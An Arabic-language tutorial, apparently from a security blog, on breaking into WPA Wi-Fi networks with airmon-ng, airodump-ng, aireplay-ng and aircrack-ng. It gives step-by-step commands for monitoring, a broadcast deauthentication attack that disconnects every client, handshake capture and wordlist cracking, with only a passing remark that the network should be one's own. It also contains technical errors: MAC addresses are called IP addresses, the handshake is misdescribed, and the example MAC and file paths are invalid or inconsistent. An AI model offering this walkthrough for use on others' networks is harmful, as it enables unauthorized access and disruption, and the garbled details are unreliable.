شروحات | اختراق الشبكات عن طريق اداة Airodump-ng
أداة Airodump-ng هي أداة قوية تستخدم في نظام Kali Linux والمتخصصة في اختراق الشبكات او اختبار امان الشبكات. توفر هذه الأداة واجهة سهلة الاستخدام لرصد الشبكات اللاسلكية المحيطة وجمع المعلومات المتعلقة بها.
مثل العناوين MAC وقوة الإشارة والقنوات. وفي هذه المقالة، سنتعلم كيفية استخدام الاداة لاختراق الشبكات وسنوضح بعض الأوامر الأساسية المستخدمة في هذه العملية.
تثبيت اداة : Airodump-ng
تعتبر هذه الأداة أساسية لأي مختبر أمان يهدف إلى فحص وتقييم الشبكات اللاسلكية. وسنقدم لكم نظرة مفصلة عن أداة Airodump-ng بما في ذلك مفهومها وكيفية استخدامها والمزايا التي تقدمها.
تاتي الاداة في مثبتة مسبقاً مع حزمة كالي وكل ماتحتاجه لاستخدامه في نظام كالي هو التأكد من التحديثات ويمكنك الرجوع الى مقالنا عن تحديث مكتبة كالي.
وايضا يمكنك تثبيت Airodump-ng على Ubuntu أو Debian، استخدام الأمر التالي:
“sudo apt-get install aircrack-ng“
قطعة مراقبة الشبكات : قطعة AWUS036ACS
في وقبل الخوض في تفاصيل اختبار امان الشبكة او اختراقها يجب عليك توفير قطعة مراقبة الشبكات ومن افضل هذا القطع هي AlfaAWUS036ACS.
وتعتبر هذه القطعة من بين أفضل قطع الواي فاي المتوافقة مع Kali Linux وتوفر أداءً متميزًا في الرصد والاختراق.
مميزات قطعة AWUS036ACS
- قابلية الاستخدام مع Kali Linux: تم تصميم قطعة Alfa AWUS036ACS لتكون متوافقة تمامًا مع Kali Linux. مما يجعلها شريكًا مثاليًا لأي مختبر أمان يستخدم هذا النظام.
- دعم معيار 802.11ac: توفر هذه القطعة دعمًا كاملاً لمعيار 802.11ac الذي يوفر سرعات عالية وأداء مستقر للشبكات اللاسلكية.
- دعم وضع الرصد: تدعم القطعة وضع الرصد (monitor mode) الذي يتيح للمستخدمين رصد الشبكات بدون الحاجة إلى الاتصال بها مباشرة.
ولشراء القطعة سوف اترك لك روابط شراء Alfa AWUS036ACS عن طريق امازون وتستطيع شرائه لبداء عملية اختراق واختبار الشبكات.
وقد سبق لنا شرح طريقة تثبيت وتعريف قطعة Alfa AWUS036ACS على نظام كالي لنكس عن طريق موجه الاوامر. وتستطيع الرجوع المقالة لتثبيت وتحديث القطعة على جهازك قبل تكملة المقالة.
طريقة استهداف الشبكات : عن طريق اداة Airodump-ng
بعد الانتهاء من تثبيت تعاريف قطعة المراقبة وايضا تثبيت وتحديث اداة Airodump-ng انت جاهز الان للبداء في عملية اختراق او اختبار الشبكات .
1- في البداية نقوم بتاكد ان القطعة تم تثبيتها وهيا تعمل بشكل صحيح على النظام وللتأكد نقوم بكتابة الامر التالي:
“iwconfig“
2- الان نقوم بتحويل القطعة الى وضعية المراقبة monitor mode من خلال الامر التالي:
“sudo airmon-ng start wlan0“
3-الان نقوم بكتابة امر التالي “وهو لقتل جميع العمليات التي تعمل على الشبكة” من خلال الامر التالي:
“sudo airmon-ng check kill“
4-نقوم بنشغيل وضعية المراقبة لاستهداف الشبكة المراد اختراقها “طبعا يجب ان تكون الشبكة خاصة بك” ومن خلال الامر التالي:
“sudo airodump-ng wlan0“
هكذا سوف تظهر امامك جميع الشبكات القريبة منك ومن هنا تبداء عملية محاولة الاختراق الشبكة ، نقوم بتحديد الشبكة المراد اختراقها.
اذا وجدنا الشبكة المراد استهدفها نقوم بايقاف وضعية المراقبة عن طريق الضغظ على مفتاح Ctrl + C لايقاف عملية المراقبة.
مايهم في هذا المعلومات هو
- Mac Address وهو عنوان ip للشبكة وياتي تحت اسم “BSSID“
- Channel وهو التردد او القناة التي تستخدمها الشبكة ويأتي تحت اسم “CH“
كماهو واضح من الشرح اعلاه نقوم بتسجيل هذه المعلومات في المفكرة لدينا لكي نقوم باختراق الشبكة وفي شرحنا سوف يكون “BSSID” هو ******36BDC3.
والقناة المستخدمة في الشبكة اعلاه هيا قناة رقم “11” الان نقوم بتسجل هذا المعلومات في مفكرة لدينا ونقوم بعدها بإكمال الخطوات .
تعريف ماهو : ملف المصافحة
جميع الخطوات التي في اعلى هيا للحصول على ملف المصافحة للشبكة المستهدفة ومن خلاله يتم محاولة اختراق الشبكة، دعني اذكر لك نبذة مبسطة ماذا يعني ملف المصافحة.
ملف المصافحة
هو ملف يستخدم في الاتصالات الشبكية لتبادل المعلومات بين جهازين عند بدء الاتصال. يحتوي هذا الملف عادة على معلومات تحديدية حول كل جهاز.
مثل العنوان البدئي (IP address)، ومعرّف الجهاز (MAC address)، والإعدادات المدعومة للاتصال. يساعد ملف المصافحة في إنشاء اتصال سلس وآمن بين الأجهزة في الشبكة.
على سبيل المثال، عندما تقوم بتوصيل جهازك بشبكة Wi-Fi جديدة، يتم إرسال ملف مصافحة إلى نقطة الوصول (Access Point) التي تدير الشبكة.
حيث يحتوي هذا الملف على معلومات مثل عنوان IP لجهازك وعنوان MAC الخاص به، مما يسمح للشبكة بتأكيد هويته ومنحه الوصول إلى الشبكة.
كيفية الحصول على هذا الملف ؟
هذا الملف لا يمكننا الحصول عليه الا بطريقة واحدة فقط ، وهيا الانتظار في وضعية المراقبة حتى يقوم جهاز ما لديه كلمة المرور بتسجيل الدخول على الشبكة.
حسنا يبدو لك ان هذا الامر غير مفيد وهو الانتظار لمدة ساعات طويلة حتى يتصل شخص ما على الشبكة! ومن ثم الحصول على هذا الملف.
حسنا ، ماذا اذا قلت لك انه توجد طريقة من خلالها نقوم بطرد جميع من هم بداخل الشبكة ، وبالتالي سوف يحاولون الاتصال مرة اخرى بشبكة ، وبالتالي الحصول على الملف بسرعة.
طريقة : الحصول على ملف المصافحة
الخطوة الاولى: نقوم بمراقبة الشبكة للحصول على ملف المصافحة “نقوم بإنشاء ملف على سطح المكتب يحتوي على هذا الملف“وهو عن طريق الامر التالي :
“sudo airodump-ng wlan0 -w /home/kail/Desktop/hack-os73 -c 11 –bssid 23:cs:ss:ss:ss“
شرح الكود الذي في الاعلى :
- sudo airodump-ng تشغيل كامسؤول ، ومن ثم استدعاء اداة المراقبة.
- wlan0 هو اسم المحول الذي نستخدمه
- w /home/kail/Desktop/hack-os73 هو امر لحفظ المعلومات التي تصل لنا في ملف على سطح المكتب ويكون اسمه hack-os73
- c 11 قناة او تردد الشبكة المستهدفة الذي قمنا بحفظه في الاعلى.
- bssid 23:cs:ss:ss:ss رقم IP address الذي قمنا ايضا بحفظه
الخطوة التالية: كما قلنا انه يجب علينا الانتظار حتى يقوم احد الاشخاص بالاتصال على الشبكة حتى نحصل على ملف المصافحة ولكن توجد طريقة اخرى.
وهيا عن طريق ” طرد جميع من هم متصلين بشبكة حالياً ” وبالتالي اجبار الاشخاص المتصلين على معاودة الاتصال ومن خلاله نستطيع الحصول على ملف المصافحة .
نقوم بفتح ” موجه اوامر جديد ” اخر ونقوم بكتابة الكود التالي :
“sudo aireplay-ng –deauth 0 -a ******* wlan0“
شرح الكود الذي في الاعلى :
- sudo aireplay-ng تشغيل كامسؤول ، ومن ثم استدعاء اداة طرد المتصلين بشبكة.
- deauth 0 هو لطرد جميع المتصلين “وليس شخص محدد”
- a ******* هنا نقوم بوضع رقم IP address الذي قمنا ايضا بحفظه للشبكة المستهدفة
- wlan0 هو اسم المحول الذي نستخدمه
الان سوف تلاحظ طرد الجميع من هم في الشبكة ، نستطيع ايقاف الطرد بعد دقيقة للتأكد من انه تم طرد الجميع ، وبعدها نقوم بإيقاف الاداة عن طريق الضغظ على مفتاح Ctrl + C .
وسوف تتصل الان الجهزة التي قمنا بطردها مرة اخرى بشبكة ، وبمجرد الاتصال سوف نحصل على ملف المصافحة على سطح المكتب كماهو واضح من الصوة ادناه.
وللتأكد قوم بتصغير موجه الاوامر وسوف تجد عدة ملفات جديدة على سطح المكتب ومنها ملف بأسم hack-os73.cap وهو ملف المصافحة والذي سوف نقوم بكسر حمايته .
طريقة : كسر ملف المصافحة
الان اتى دور كسر حماية المصافحة عن طريق ادخال ملف يحتوي على كلمات مرور وقد سبق لنا شرح طريقة الحصول على كلمات المرور الجاهزة في نظام كالي.
وايضا قد سبق لنا شرح طريقة انشاء ملف يحتوي على كلمات مرور من اختيارك وفيها قمنا بإنشاء ملف يحتوي على جميع ارقام المملكة السعودية.
يجب عليك اختيار اي طريقة سوف استخدمها : سواء كلمات المرور الجاهزة ، او انشاء كلمات مرور خاصة بك او متوقعة.
1- الان نقوم بتحديد الملف الذي يحتوي على كلمات المرور لاستخدمه في كسر ملف المصافحة للشبكة المستهدفة ، عن طريق الكود التالي:
“sudo aircrack-ng /home/kali/Desktop/hack1-01.cap -w /home/kali/Desktop/****.txt“
شرح الكود الذي في الاعلى :
- sudo aircrack-ng تشغيل كامسؤول ، ومن ثم استدعاء اداة لكسر ملف المصافحة.
- /home/kali/Desktop/hack1-01.cap هو عنوان ملف المصافحة الذي حصلنا عليه من مراقبة الشبكة.
- -w /home/kali/Desktop/****.txt هو الملف الذي قمنا بصنعته ويحتوي على كلمات مرور لكسر المصافحة.
والان كل ماعليك هو الانتظار: الى ماتجد الاداة كلمة مرور الملف ، وسرعة الاداة تعتمد على قوة جهازك وتستطيع تجربة العديد من ملفات كسر الباسوردات .
وكما هو واضح في الصورة التي في الاعلى تم الحصول على كلمة مرور ملف المصافحة وهو “12345678” الان تستطيع الذهاب الى الشبكة المستهدفة واستخدام هذا الرمز للاتصال.